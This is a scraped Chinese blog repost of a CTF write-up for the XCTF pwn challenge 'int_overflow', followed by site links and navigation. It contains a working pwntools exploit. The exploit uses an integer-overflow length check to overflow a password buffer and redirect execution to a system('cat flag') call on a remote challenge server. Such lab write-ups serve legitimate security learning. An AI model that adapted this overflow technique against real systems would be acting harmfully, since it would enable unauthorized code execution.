[pwn] - xctf题目wp - 代码天地

[pwn] - xctf题目wp

其他 2020-10-17 07:38:50 阅读次数: 0

int_overflow

exp.py:


#!/usr/bin/env python
from pwn import *

sh = remote("124.126.19.106",42438)

flag_addr=0x08048694

payload = 'A'*0x14 + 'AAAA' + p32(flag_addr) + 'a'*(256-0x14-4-4+5)
#‘A’*0x14是溢出到ebp
#'AAAA'是之前pop过一次，出栈操作还存着一个ebp地址
#flag_addr是调用system('cat flag')的调用地址
#256+5是为了绕过他的<3u || >8u就报错的分支，-0x14-4-4分别是减去溢出代码、'AAAA'、flag_addr之后补全这么多个空字符
sh.sendlineafter("choice:","1")
sh.sendlineafter("username:\n","xctf")
sh.sendlineafter("passwd:\n",payload)

print sh.recvall()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/s11show_163/article/details/105766296

[pwn] - xctf题目wp

BUUCTF PWN部分题目wp

XCTF - pwn when_did_you_born - WP

XCTF-PWN welpwn

xctf-pwn hello_pwn

Jarvis OJ Pwn Wp

JarvisOJ PWN fm wp

JarvisOJ PWN smashes WP

bugku - pwn wp

xctf-pwn 之string

XCTF PWN level3

LCTF pwn题目

ciscn2018-pwn-wp

[WP]BugkuCtf - pwn2

Bugku pwn5 WP

Bugku pwn4 WP

【pwn】2021 鹤壁杯 wp

【pwn】攻防世界 pwn新手区wp

pwn加载题目给定的so

ctf pwn题目的部署

XCTF hello_pwn write up

xctf-pwn 之guess_num

XCTF pwn-100(使用DynELF)

xctf-pwn level3

攻防世界XCTF新手区pwn

pwn

CG-CTF pwn部分wp

buuctf pwn wp---part1

JarvisOJ PWN Tell me Something wp

JarvisOJ PWN level1 wp

今日推荐

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

周排行

NEFU 117 素数个数的位数

Closest Common Ancestors (Lca,tarjan)

ELK部署

【转载】Hive笔记整理（三）

SQL语句（一）基本表的定义

关于Java web开发中的MySQL的事务语句

MFC创建自定义窗体

如何用一句话激怒程序员？

《逆袭大学》文摘——9.4 基础和应用的平衡中找到大学的节奏

【spring源码分析】@Value注解原理

每日归档

更多

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)